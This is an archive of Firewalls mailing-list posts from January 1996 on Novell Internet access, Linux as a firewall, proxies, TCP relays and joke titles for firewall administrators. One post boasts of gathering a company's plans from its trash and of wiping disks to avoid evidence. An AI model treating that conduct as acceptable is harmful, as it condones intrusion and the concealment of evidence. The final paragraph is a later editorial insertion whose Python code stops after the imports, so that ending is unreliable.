From: avos@kpmg.nl (Arjan Vos)
Subject: Internet-access from Novell
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A client of mine wishes to offer access to the Internet to her employees (circa 50 employees). The company uses a Novell Netware 4 network with Netscape 2.0 installed and they are thinking about using Lan Workplace for the TCP/IP stack.

My questions are:

- Is the use of Netscape and Lan Workplace a good idea or are there better alternatives for Novell to offer Internet-access?
- If someone knows any other solutions for offering Internet-access from Novell, please let me know, and if possible, give me an indication of the costs.
- When using IPX, is there a "natural firewall" (TCP/IP vs IPX); which other security measures must be taken?
Thanks,

Arjan Vos

From firewalls-owner Sun Jan 14 02:40:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10900 for firewalls-outgoing; Sun, 14 Jan 1996 02:31:51 -0800 (PST)
Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10870 for ; Sun, 14 Jan 1996 02:31:28 -0800 (PST)
Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id SAA12105; Sun, 14 Jan 1996 18:30:18 +0800
Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma012072; Sun Jan 14 18:29:50 1996
X-Sender: todd@mailhost.momentum.com.au
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 14 Jan 1996 18:30:45 +0800
To: Firewalls@GreatCircle.COM
From: todd@momentum.com.au (Todd Hooper)
Subject: Re: Linux as a firewall
Cc: dana@nav.cc.tx.us
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Dana writes:

>I've noticed that a lot of people say they use Linux as part of their
>Internet firewall. But now I've had a company tell me that Linux isn't a
>true multi-tasking operating system, so it shouldn't be used as a
>firewall. What's the true story here?

Ignoring some of the more technical arguments, IMHO there are two management reasons which may cause you to examine the role of Linux (or indeed Unix on Intel) in a mission critical security application such as a firewall. These need to be taken into account at the cost/benefit stage where you are choosing the platform, not six months down the track when you are committed to the solution. They are:

1. Support infrastructure for non-commercial operating systems

   Is there commercial technical support available? Does it fit in with your existing support arrangements for mission critical systems?

   In my locality, the answer to this question is no. Relying on non-commercial and Internet based support is highly questionable, especially if the failure of the system means you may not have any access to the main support channel.

2. Ability of Intel vendors to provide hardware maintenance and spares

   (This point applies to any Intel based system. I assume that the top tier Intel vendors such as Digital and Compaq won't have a problem providing this when you buy one of their top end servers, but you need to figure that into the cost of the solution, rather than doing your cost/benefit on the price of the cheapest Intel clone.)

   If your Intel based host melts down into a pile of ash, can your Intel vendor provide a decent level of hardware maintenance? Can they provide a replacement machine with an identical configuration? Given the pace at which Intel motherboard technology advances, most designs are usually obsolete within 6 months. Don't forget all of the supporting storage, video and networking cards as well which your system requires to function.

   If you can't get an identical replacement system, how is that going to affect your ability to rebuild the system from backups? Is your Unix implementation such that a backup from the original host with hardware configuration X will be useless when you move to the replacement host with hardware configuration Y? I am not an expert in this area but I am led to believe that it can be problematic to recover from this type of situation without reworking some of the installation to accommodate the hardware changes.

   If you change something fundamental in your firewall configuration in order to get the system back online then IMHO you are obliged to revisit a significant part of the design and testing phase to ensure nothing has broken during the process due to some sort of cascade effect. How is that going to affect your downtime?

   As an example - the SCSI card model X in your Intel host dies after a year of faithful service. You can't buy a model X anymore so you need to get a model Y. But your Unix on Intel implementation hasn't been updated for six months and it doesn't support Y. How quickly can you a) update the operating system, b) install the hardware and get the server back online and c) ensure that the new software & hardware has not affected the integrity of the firewall?

   If you intend to buy spare parts for all of the critical components, then factor the cost in at the start. Or evaluate the service from a vendor where they keep identical replacement parts for some years, and can provide it under a hardware maintenance contract within a specified response time (all at a cost, of course).

I should point out that these points are based on experience in discussing this issue with many clients, rather than any sort of backhanded attempt to slur Intel based solutions in favour of traditional Unix vendors. We can and do run many Intel based solutions here, but only after the appropriate analysis has taken these factors into account.

Regards,

Todd

--
Todd Hooper             Internet : todd@momentum.com.au
Momentum Pty Ltd        Phone    : 09 380 4372
Western Australia       Fax      : 09 380 4371

From firewalls-owner Sun Jan 14 05:40:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA26913 for firewalls-outgoing; Sun, 14 Jan 1996 05:36:09 -0800 (PST)
Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA26908 for ; Sun, 14 Jan 1996 05:36:05 -0800 (PST)
Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAE25C.076C32F0@big486.ed-com.com>; Sun, 14 Jan 1996 08:40:59 -0500
From: Ed Woodrick
To: "firewalls@GreatCircle.COM"
Subject: RE: Internet-access from Novell
Date: Sun, 14 Jan 1996 08:40:58 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Arjan,

You might want to review the Product from CISCO, Internet Junction Passport. It is billed as a "Connect your Novell Network to the Internet in one easy step."

The following is a list of highlights:

- Simple and Easy Installation
- NO TCP/IP at the desktop
- Isolates NetWare server from the Internet
- Preserves Network Investment
- Single IP address for the entire network.

Internet Junction, a CISCO Company
http://www.ij.com
(415) 934-3600
(415) 934-3601 Fax

I have no experience with the product, but it does seem to fit a Novell network fairly perfectly.
Ed Woodrick
EDCOM
ewoodrick@ed-com.com

----------
From: avos@kpmg.nl[SMTP:avos@kpmg.nl]
Sent: Sunday, January 14, 1996 5:12 AM
To: firewalls@GreatCircle.COM
Subject: Internet-access from Novell

A client of mine wishes to offer access to the Internet to her employees (circa 50 employees). The company uses a Novell Netware 4 network with Netscape 2.0 installed and they are thinking about using Lan Workplace for the TCP/IP stack.

My questions are:

- Is the use of Netscape and Lan Workplace a good idea or are there better alternatives for Novell to offer Internet-access?
- If someone knows any other solutions for offering Internet-access from Novell, please let me know, and if possible, give me an indication of the costs.
- When using IPX, is there a "natural firewall" (TCP/IP vs IPX); which other security measures must be taken?

Thanks,

Arjan Vos

From firewalls-owner Sun Jan 14 05:55:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA26601 for firewalls-outgoing; Sun, 14 Jan 1996 05:26:39 -0800 (PST)
Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA26594 for ; Sun, 14 Jan 1996 05:26:34 -0800 (PST)
Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAE25A.AD2EA800@big486.ed-com.com>; Sun, 14 Jan 1996 08:31:18 -0500
From: Ed Woodrick
To: "Firewalls@GreatCircle.COM"
Subject: RE: Linux as a firewall
Date: Sun, 14 Jan 1996 08:31:17 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Todd,

So would you suggest,

1. Making sure that you spend $50,000 on a vendor that you are not exactly sure will be around next year?

2. Spend $30,000 for hardware plus $15,000 in hardware and OS maintenance instead of buying two exact duplicates of a system?

I would have answered that LINUX is as true of a multi-tasking system as just about anything else. NOTHING is truly multi-tasking unless it has more than one processor. Plus, the serial or ethernet connections on either side of the firewall are both serial in operation. You don't want "multi-tasking" to process the packets, you want just plain raw speed.

Remember that the safest firewall is one that is stopped, not running!

Ed Woodrick

----------
From: todd@momentum.com.au[SMTP:todd@momentum.com.au]
Sent: Sunday, January 14, 1996 5:30 AM
To: Firewalls@GreatCircle.COM
Cc: dana@nav.cc.tx.us
Subject: Re: Linux as a firewall

Dana writes:

>I've noticed that a lot of people say they use Linux as part of their
>Internet firewall. But now I've had a company tell me that Linux isn't a
>true multi-tasking operating system, so it shouldn't be used as a
>firewall. What's the true story here?

Ignoring some of the more technical arguments, IMHO there are two management reasons which may cause you to examine the role of Linux (or indeed Unix on Intel) in a mission critical security application such as a firewall. These need to be taken into account at the cost/benefit stage where you are choosing the platform, not six months down the track when you are committed to the solution. They are:

1. Support infrastructure for non-commercial operating systems

2. Ability of Intel vendors to provide hardware maintenance and spares

Regards,

Todd

--
Todd Hooper             Internet : todd@momentum.com.au
Momentum Pty Ltd        Phone    : 09 380 4372
Western Australia       Fax      : 09 380 4371

From firewalls-owner Sun Jan 14 06:40:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA28367 for firewalls-outgoing; Sun, 14 Jan 1996 06:29:51 -0800 (PST)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA28362 for ; Sun, 14 Jan 1996 06:29:47 -0800 (PST)
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzymj21589; Sun, 14 Jan 1996 09:28:38 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07347; Sun, 14 Jan 96 09:18:40 EST
Date: Sun, 14 Jan 1996 09:18:39 -0500 (EST)
From: Sick Puppy
Subject: Re: Relijon, Firewalls, Filosofi
To: firewalls@GreatCircle.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As several list participants pointed out, Version 2.0 of Firewall-1 supports encryption and authentication. Thanks, I didn't know that. (Even with two brains *I* still don't know everything)

Last Friday I was watching some hacker d00d come out of an X.25 gateway and bang away at a site that has a large network. From the responses he got back it looks like that site uses TIS stuff and he didn't get in.

Anyway, watching that guy raised a question. I know that Clueless Cats Corp is planning to synchronize its Sybase databases with the central offices of Top Dogs Plc in Europe, using IP tunneled through X.25, because the draft implementation plan they threw out in their trash explains it in detail. How can they be sure that the X.25 gateway their IP application is talking to is really the machine it is supposed to talk to and not merely some d00d who is good at IP spoofing?
How does authentication work in this situation?

Sick Puppy, the Cat_Eating_Dawg
I'm CERTified, crucified like a saviour for misbehaviour, I'm CERTified
-=:( "You can't crack security really well unless you understand it" ):=-
-=:( Tsu Szu Poo, Ancient Japanese Warrior Dawg ):=-

P.S. Nothing I say should be construed as an admission of illegal or unethical behaviour on my part. I didn't do it, you didn't see me, and the only real evidence you could have is what I am not going to tell you. That "Boss" button there erases everything on my hard disks, to DoD standards.

From firewalls-owner Sun Jan 14 07:13:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA28942 for firewalls-outgoing; Sun, 14 Jan 1996 06:59:11 -0800 (PST)
Received: from dax.sai.com (dax.sai.com [198.137.245.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA28937 for ; Sun, 14 Jan 1996 06:59:06 -0800 (PST)
Received: from dax.sai.com by dax.sai.com with smtp (Smail3.1.29.1 #3) id m0tbTtm-003pMUC; Sun, 14 Jan 96 09:59 EST
Date: Sun, 14 Jan 1996 09:59:09 -0500 (EST)
From: Darryl Wagoner
To: Todd Hooper
cc: Firewalls@GreatCircle.COM, dana@nav.cc.tx.us
Subject: Re: Linux as a firewall
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings,

I don't normally get into these discussions, but there are enough flaws in logic that I must reply.

On Sun, 14 Jan 1996, Todd Hooper wrote:

> Dana writes:
>
> >I've noticed that a lot of people say they use Linux as part of their
> >Internet firewall. But now I've had a company tell me that Linux isn't a
> >true multi-tasking operating system, so it shouldn't be used as a
> >firewall. What's the true story here?

The person that told you that Linux isn't a multi-tasking OS doesn't have a clue. It is a very good multi-tasking and multi-user system.

> They are:
>
> 1. Support infrastructure for non-commercial operating systems
>
> Is there commercial technical support available? Does it fit in
> with your existing support arrangements for mission critical
> systems?
>
> In my locality, the answer to this question is no. Relying on
> non-commercial and Internet based support is highly questionable,
> especially if the failure of the system means you may not have any
> access to the main support channel.

Not ever having lived in or visited Australia, I can't say too much about the support. But it seems unlikely that the OS would have a failure that wouldn't allow you access to the net. As far as hardware failure, in many cases a hot spare is as affordable as a maintenance contract when you add in down time.

> 2. Ability of Intel vendors to provide hardware maintenance and spares
>
> If your Intel based host melts down into a pile of ash, can your
> Intel vendor provide a decent level of hardware maintenance?
> Can they provide a replacement machine with an identical
> configuration? Given the pace at which Intel motherboard
> technology advances, most designs are usually obsolete within
> 6 months. Don't forget all of the supporting storage, video
> and networking cards as well which your system requires
> to function.

Obsolete doesn't mean that you can't get them. They may be more of a problem with a COTS OS than Linux. Linux support for new hardware is very good as well, because of the large group of programmers working on it.

> If you can't get an identical replacement system, how is that
> going to affect your ability to rebuild the system from backups?
> Is your Unix implementation such that a backup from the original
> host with hardware configuration X will be useless when you
> move to the replacement host with hardware configuration Y? I
> am not an expert in this area but I am led to believe that it can
> be problematic to recover from this type of situation without
> reworking some of the installation to accommodate the hardware
> changes.

This isn't as big of a problem as it sounds. Let's look at the list of possible crash and burn parts:

* Motherboard - This is really the big concern as they change quickly and the OS can be thrown by the changes. But if you don't try to stay on the bleeding edge then Linux will support just about any motherboard you throw at it.
* Memory - Never heard of Linux having problems with memory
* Disk controller - Not a big risk, but buy a spare
* Video - they all support CGA mode, which for a firewall is all you need.
* Ethernet - very standard and very cheap; buy a spare

If it is mission critical then I would have a hot spare. This would mean no downtime and you can take your time in solving your first FW problem.

Software support is another issue. Take any vendor you wish to name and you are looking at 3-6 weeks min. for a show stopper problem in their OS to be fixed. I have had problems fixed on Linux within hours of reporting it. If your problem is only affecting you or they don't consider it a show stopper (which in most cases they don't) then it will be fixed in the next release. With Linux you always have the option to fix it in house.

--
Darryl Wagoner                  darryl@sai.com
http://www.sai.com/
Office: 603.672.0736            Fax: 603-672-4846
Web Pages for hire. Check out NH & MA Movies http://www.sai.com/movies

From firewalls-owner Sun Jan 14 07:25:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA29370 for firewalls-outgoing; Sun, 14 Jan 1996 07:16:11 -0800 (PST)
Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA29357 for ; Sun, 14 Jan 1996 07:16:05 -0800 (PST)
Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id KAA03177; Sun, 14 Jan 1996 10:10:05 -0500
Date: Sun, 14 Jan 1996 10:10:05 -0500 (EST)
From: Chris Woods
To: Ed Woodrick
cc: "Firewalls@GreatCircle.COM"
Subject: RE: Linux as a firewall
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sun, 14 Jan 1996, Ed Woodrick wrote:

> Todd,
>
> So would you suggest,
[...]

OK, let's nip this in the bud right here. I see an OS war coming, as always happens when discussing the feasibility of {linux,freebsd,netbsd,name-your-free-os-here} in a particular application.

Suffice it to say that in evaluating a product (whether it's free or not) one must gather as much information as possible from various different sources, weigh the pros and cons of each alternative, and make the decision based on cost, performance, ease of use, or whatever else is an important consideration.

This is not directed at Ed, or Todd, or anyone specific; just that we don't need a "My OS is better than your OS" thing happening here.

Chris Woods                       cjwoods@paladin.com (office)
Systems Administrator             cjwoods@gigotech.net (home)
Paladin Computing Solutions       http://www.paladin.com
"A computer without Windows is like a fish without a bicycle."
From firewalls-owner Sun Jan 14 08:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01407 for firewalls-outgoing; Sun, 14 Jan 1996 08:14:28 -0800 (PST) Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01402 for ; Sun, 14 Jan 1996 08:14:18 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA06982; Sun, 14 Jan 1996 17:13:46 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009284; Sun Jan 14 17:13:16 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA14412; Sun, 14 Jan 1996 17:12:00 +0100 Message-Id: <9601141612.AA14412@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA08049; Sun, 14 Jan 96 17:11:59 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA07587; Sun, 14 Jan 96 17:11:58 +0100 From: Rolf Weber Subject: Re: "Title for Firewall Admin? To: firewalls@greatcircle.com (firewalls) Date: Sun, 14 Jan 1996 17:11:57 +0100 (MEZ) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? steamroller. it came in mind when i heard there is a firewall product called "catapult"... -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. 
From firewalls-owner Sun Jan 14 08:55:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01777 for firewalls-outgoing; Sun, 14 Jan 1996 08:48:32 -0800 (PST) Received: from ns1.eds.com (ns1.eds.com [192.85.154.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01772 for ; Sun, 14 Jan 1996 08:48:29 -0800 (PST) Received: by ns1.eds.com (hello) id LAA01702; Sun, 14 Jan 1996 11:47:32 -0500 Received: by nnsa.eds.com (hello) id LAA06467; Sun, 14 Jan 1996 11:47:02 -0500 Message-Id: <199601141647.LAA06467@nnsa.eds.com> Received: by sys1hp03 (1.37.109.16/16.2) id AA012657143; Sun, 14 Jan 1996 11:32:23 -0500 From: Mark E Dyer Subject: Re: "Title for Firewall Admin? To: Firewalls@GreatCircle.COM Date: Sun, 14 Jan 1996 11:32:23 EST In-Reply-To: <199601122310.PAA12337@miles.greatcircle.com>; from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 3:10 pm X-Mailer: Elm [revision: 109.14] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Fire Eater or Fire Walker have possibilities From firewalls-owner Sun Jan 14 09:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02487 for firewalls-outgoing; Sun, 14 Jan 1996 09:25:16 -0800 (PST) Received: from atc.boeing.com (atc.boeing.com [130.42.28.80]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02482 for ; Sun, 14 Jan 1996 09:25:12 -0800 (PST) Received: by atc.boeing.com (5.65/splinter.boeing.com) id AA24201; Sun, 14 Jan 1996 09:28:11 -0800 Received: by igate2.he.boeing.com (5.57/DEC-Ultrix/4.3) id AA07869; Sun, 14 Jan 96 12:30:45 -0500 Received: by helios.he.boeing.com (4.1/SMI-4.1) id AA24032; Sun, 14 Jan 96 12:21:39 EST Date: Sun, 14 Jan 1996 12:21:37 -0500 (EST) From: "Allan R. Hoegg" X-Sender: bvn011@helios To: Rolf Weber Cc: firewalls Subject: Re: "Title for Firewall Admin? 
In-Reply-To: <9601141612.AA14412@spibm02> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sacrificial Lamb would be most appropriate On Sun, 14 Jan 1996, Rolf Weber wrote: > Date: Sun, 14 Jan 1996 17:11:57 +0100 (MEZ) > From: Rolf Weber > To: firewalls > Subject: Re: "Title for Firewall Admin? > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > steamroller. > it came in mind when i heard there is a firewall product > called "catapult"... > -- > ----------------------------------------- > Rolf Weber | All I ask is a chance > IEZ AG D-64625 Bensheim | to prove that money > ++49-6251-1309-113 | can't make me happy. > __\/__ . / ^ _ \ . |\| (o)(o) |/| #-.OOOo----oo----oOOO.--------# # A. R. Hoegg # # NADDSS 610-591-7091 # # Boeing Helicopters # # The more I learn, the # # less I know. # # Pretty soon I'll know # # everything about nothing! # # :-) :-) # #____________Oooo.____________# .oooO ( ) ( ) ) / \ ( (_/ \_) From firewalls-owner Sun Jan 14 10:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04404 for firewalls-outgoing; Sun, 14 Jan 1996 10:29:44 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA04399 for ; Sun, 14 Jan 1996 10:29:39 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA76 for ; Sun, 14 Jan 1996 13:27:50 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com>; Mon, 15 Jan 1996 01:26:11 -0500 Message-ID: <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: "'Firewalls'" Subject: RE: "Title for Firewall Admin? 
Date: Mon, 15 Jan 1996 01:26:08 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How 'bout "Toll Booth Attendant" ... After all, its generally accepted that you have to pay to get certain services through your gate, non? (i.e. RealAudio!) or "Corporate Access Paladin" ... then you can be called "Cap", as in "Aye, aye, Cap" or "Sentinel at " ... reminded me of the Oracle at Delphi Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Sun Jan 14 12:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA09481 for firewalls-outgoing; Sun, 14 Jan 1996 12:13:40 -0800 (PST) Received: from picard.nib.com ([205.136.146.102]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA09475 for ; Sun, 14 Jan 1996 12:13:36 -0800 (PST) Received: from picard.nib.com (jclark@picard.nib.com [205.136.146.102]) by picard.nib.com (8.6.9/8.6.9) with SMTP id PAA01739; Sun, 14 Jan 1996 15:30:38 -0500 Date: Sun, 14 Jan 1996 15:30:37 -0500 (EST) From: "Jay R. Clark" To: Russ Cooper cc: "'Firewalls'" Subject: RE: "Title for Firewall Admin? In-Reply-To: <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > "Corporate Access Paladin" ... then you can be called "Cap", as in "Aye, > aye, Cap" > or > "Sentinel at " ... 
reminded me of the Oracle at
> Delphi

Given management's proclivity to often confuse the message with the messenger, how 'bout "roadkill" as in on the information superhighway

From firewalls-owner Sun Jan 14 12:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA10694 for firewalls-outgoing; Sun, 14 Jan 1996 12:27:44 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA10673 for ; Sun, 14 Jan 1996 12:27:36 -0800 (PST) Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id UAA08325; Sun, 14 Jan 1996 20:26:40 GMT Date: Sun, 14 Jan 1996 20:26:40 GMT Message-Id: <199601142026.UAA08325@smtp-gw01.ny.us.ibm.net> Received: from slip139-92-18-243.emea.ibm.net(139.92.18.243) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaT3YGDM; Sun Jan 14 20:26:34 1996 X-Sender: avivi@pop03.ca.us.ibm.net (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: avivi@ibm.net (Avishai Avivi) Subject: TS and stuff Cc: avivi@ibm.net X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Guys,

With all due respect I think we should drop the discussion on all of the various security levels there are out there... I truly believe (from personal experience) that the less you discuss these things, the better off you all are... Besides, I think the networking world has enough acronyms to keep us guessing. :-o

I also happen to agree with the line in the movie "Snickers" - Too Many Secrets. Knowing and/or dealing with classified information has nothing glorious about it, and I found that it contributed greatly to my receding hairline.. :-(

Does anyone know of any good guidelines on how to build proxies, or where one might be able to get his hands on a skeleton proxy that is customizable enough?

Also I have a problem some of you mentioned... While I'm the "cop" at my organization as far as security is concerned (also known as "The anal retentive networking dude") I do have superiors who do not understand what is wrong in allowing rsh and such between segments (We are really paranoid). So I took a source for rsh, and modified it a bit to include some security oriented features (such as checking the username against a list of authorized commands). But I think I'm probably trying to re-invent the wheel. Does any of you know of a source of secured services?

For now,
-Avishai

Regards,
-Avishai
----------------------------------------------------------------------------
Avishai Avivi avivi@ibm.net
----------------------------------------------------------------------------
- Life is pain, anyone telling you otherwise is either lying or trying to sell you something.

From firewalls-owner Sun Jan 14 13:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15229 for firewalls-outgoing; Sun, 14 Jan 1996 13:16:19 -0800 (PST) Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15201 for ; Sun, 14 Jan 1996 13:16:11 -0800 (PST) Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.12/8.6.5) id QAA20882; Sun, 14 Jan 1996 16:12:12 -0500 To: firewalls@GreatCircle.COM Path: lokkur.dexter.mi.us!not-for-mail From: scs@lokkur.dexter.mi.us (Steve Simmons) Newsgroups: local.firewalls Subject: Re: "Title for Firewall Admin? Date: 14 Jan 1996 16:12:11 -0500 Organization: Inland Sea Lines: 5 Distribution: local Message-ID: <4dbrjb$kcf@lokkur.dexter.mi.us> References: <9601121758.ZM6279@toolbox.rutgers.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

`Sir.'

`Mr. Sir' on good days.
--
"Home pages are the pet rock of the 90s. We all have them, we all think they're very cute. But in a few years we're going to look back and be pretty embarrassed."
-- Tony Shepps

From firewalls-owner Sun Jan 14 14:25:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA21147 for firewalls-outgoing; Sun, 14 Jan 1996 14:13:43 -0800 (PST) Received: from hephaestus.icorp.net (hephaestus.in.icorp.net [206.104.128.226]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA21126 for ; Sun, 14 Jan 1996 14:13:37 -0800 (PST) Received: by hephaestus.icorp.net (Smail3.1.29.1 #8) id m0tbafL-000LyhC; Mon, 15 Jan 96 04:12 GMT-6 Message-Id: From: ewieling@hephaestus.icorp.net (Eric Wieling) Subject: TCP and UDP relay software. To: Firewalls@GreatCircle.COM Date: Mon, 15 Jan 1996 04:12:43 +0600 (GMT-6) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Our network is divided into several segments, none of which are considered "trusted". I am looking for a daemon that I can run on the firewall that can take incoming TCP connections or UDP datagrams and forward them to a prespecified host. Mostly I want users on several of the segments to be able to telnet to some port, and have the connection relayed to an outside service such as Lexus/Nexus, or WestLaw.

I have searched high and low and simply cannot find such software. I understand that the application for this is rather limited. People tend to want to be able to telnet to any host they want. I could use some SOCKS aware telnet program I suppose, but there don't seem to be many SOCKS aware telnet clients for MS-Windows.

Regards,
Eric
--
Eric Wieling
Network Operations Center
Inter Commerce Corporation

From firewalls-owner Sun Jan 14 16:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA02773 for firewalls-outgoing; Sun, 14 Jan 1996 16:36:59 -0800 (PST) Received: from linknet.kitsap.lib.wa.us (linknet.kitsap.lib.wa.us [198.187.135.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA02768 for ; Sun, 14 Jan 1996 16:36:54 -0800 (PST) Received: (from jpaine@localhost) by linknet.kitsap.lib.wa.us (8.6.12/8.6.9) id QAA04344; Sun, 14 Jan 1996 16:34:45 -0800 Date: Sun, 14 Jan 1996 16:34:43 -0800 (PST) From: john paine To: Rolf Weber cc: firewalls Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601141612.AA14412@spibm02> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Sun, 14 Jan 1996, Rolf Weber wrote:
> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
>
> steamroller.

How about pyromancer?
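The relay Eric Wieling asks for above (a fixed-destination TCP "plug board" of the kind the TIS Firewall Toolkit ships as plug-gw) is small enough to show in full. What follows is an added example in Python written for this archive; it is not code from any of the posts, from plug-gw or from any product named in the thread. The destination host names, the listening port numbers and the 10.1/10.2 source networks are placeholders. The relay listens on a local port, refuses clients outside the permitted segments, opens one connection to the fixed destination and copies bytes both ways until either side hangs up, counting bytes so the session can be logged. It also answers Avishai Avivi's earlier request for a customizable skeleton proxy: per-connection policy (who may connect, to where, how much moved) lives in `source_allowed()` and the byte counts returned by `pump()`. UDP is not covered; a datagram relay needs its own table of reply addresses.

```python
import ipaddress
import select
import socket
import threading

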